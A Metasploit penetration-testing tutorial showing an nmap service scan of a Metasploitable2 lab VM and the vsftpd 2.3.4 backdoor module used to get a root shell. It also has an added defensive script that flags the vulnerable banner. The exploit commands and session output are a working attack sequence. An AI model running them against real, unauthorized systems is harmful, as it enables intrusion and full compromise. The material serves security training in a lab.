Metasploit in Practice, Part 4: Scanning and Penetrating Internal Hosts with Metasploit's Nmap Plugin (Metasploit penetration tutorial)

Reader submission 279 2022-10-02



Attacker machine: Kali 192.168.175.128

Target machine: WinXP 192.168.175.130

Internal host: Metasploitable2 192.168.175.131

In the previous article, "Metasploit in Practice, Part 3: Gaining Control of the Target with Metasploit", we already obtained control of the target machine and learned from the arp command that the internal network contains a host with the IP address 192.168.175.131. Next, we first scan that host with Nmap.

1. Start the MSF console

msfconsole

2. Scan the internal host

nmap -sV 192.168.175.131

The result is as follows:

msf5 > nmap -sV 192.168.175.131
[*] exec: nmap -sV 192.168.175.131

Starting Nmap 7.70 ( ) at 2019-01-23 12:28 CST
Nmap scan report for 192.168.175.131
Host is up (0.0029s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  Apache 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login       OpenBSD or Solaris rlogind
514/tcp  open  tcpwrapped
1099/tcp open  rmiregistry GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11 (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:CF:F6:AC (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 12.57 seconds

Here we use the vsftpd 2.3.4 vulnerability to compromise the internal host.
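The scan report above is what lets a defender spot the same thing the attacker spots: an FTP banner advertising vsftpd 2.3.4, the version the backdoor module found later in this walkthrough targets. As an added example (not part of the original article), the script below parses `nmap -sV` service lines in the report format shown, and flags any open service whose banner is on a watch list; the sample report is constructed from lines on this page, and the watch list, its single entry, and the function names are the author's own choices.

```python
import re

# Constructed sample in the layout of this page's `nmap -sV` report
# (a subset of the real lines, plus one with no version string).
SAMPLE_NMAP = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
514/tcp  open  tcpwrapped
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
"""

# Watch list of (product, version) -> reason. The one entry comes from this
# page: the Metasploit module it finds for vsftpd 2.3.4. A real deployment
# would load this from a vulnerability feed instead of a literal.
WATCH_LIST = {
    ("vsftpd", "2.3.4"): "exploit/unix/ftp/vsftpd_234_backdoor",
}

# port/proto  state  service  [version ...]
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap_services(report):
    """Return one dict per port line of an nmap normal-format report."""
    services = []
    for line in report.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:  # header, banner and summary lines are skipped
            continue
        port, proto, state, service, version = m.groups()
        services.append({"port": int(port), "proto": proto, "state": state,
                         "service": service, "version": version.strip()})
    return services


def flag_known_issues(services):
    """Return (port, banner, reason) for open services on the watch list."""
    findings = []
    for svc in services:
        parts = svc["version"].split()
        if svc["state"] != "open" or len(parts) < 2:
            continue  # closed/filtered, or no product+version to match on
        key = (parts[0].lower(), parts[1])
        if key in WATCH_LIST:
            findings.append((svc["port"], svc["version"], WATCH_LIST[key]))
    return findings


if __name__ == "__main__":
    for port, banner, reason in flag_known_issues(parse_nmap_services(SAMPLE_NMAP)):
        print(f"tcp/{port}: {banner} -> {reason}")
```

Run against the full report on this page, only the port 21 line matches; ProFTPD 1.3.1 on 2121 is not on the watch list and is left alone.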

3. Exploit the vsftpd 2.3.4 vulnerability to compromise the internal host

3-1. Search for the vsftpd 2.3.4 vulnerability

Here, use the command search vsftpd 2.3.4, as follows:

msf5 > search vsftpd 2.3.4

Matching Modules
================

   Name                                  Disclosure Date  Rank       Check  Description
   ----                                  ---------------  ----       -----  -----------
   auxiliary/gather/teamtalk_creds                        normal     No     TeamTalk Gather Credentials
   exploit/multi/                        2018-04-30       excellent  Yes    osCommerce Installer Unauthenticated Code Execution
   exploit/multi/                        2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

3-2. Prepare the attack

Here, we enter the following commands in order:

search vsftpd 2.3.4
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOSTS 192.168.175.131
show payloads
set payload cmd/unix/interact
exploit

The full session is as follows:

msf5 > search vsftpd 2.3.4

Matching Modules
================

   Name                                  Disclosure Date  Rank       Check  Description
   ----                                  ---------------  ----       -----  -----------
   auxiliary/gather/teamtalk_creds                        normal     No     TeamTalk Gather Credentials
   exploit/multi/                        2018-04-30       excellent  Yes    osCommerce Installer Unauthenticated Code Execution
   exploit/multi/                        2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   21               yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.175.131
RHOSTS => 192.168.175.131
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

   Name               Disclosure Date  Rank    Check  Description
   ----               ---------------  ----    -----  -----------
   cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.175.131:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.175.131:21 - USER: 331 Please specify the password.
[+] 192.168.175.131:21 - Backdoor service has been spawned, handling...
[+] 192.168.175.131:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.175.128:44413 -> 192.168.175.131:6200) at 2019-01-23 14:00:16 +0800

ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:cf:f6:ac
          inet addr:192.168.175.131  Bcast:192.168.175.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fecf:f6ac/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:5408 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2778 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:368033 (359.4 KB)  TX bytes:249606 (243.7 KB)
          Interrupt:19 Base address:0x2000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:766 errors:0 dropped:0 overruns:0 frame:0
          TX packets:766 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:349561 (341.3 KB)  TX bytes:349561 (341.3 KB)

In this way, we scanned the target host with Nmap and, by attacking the vsftpd 2.3.4 vulnerability through Metasploit, obtained control of the internal server.
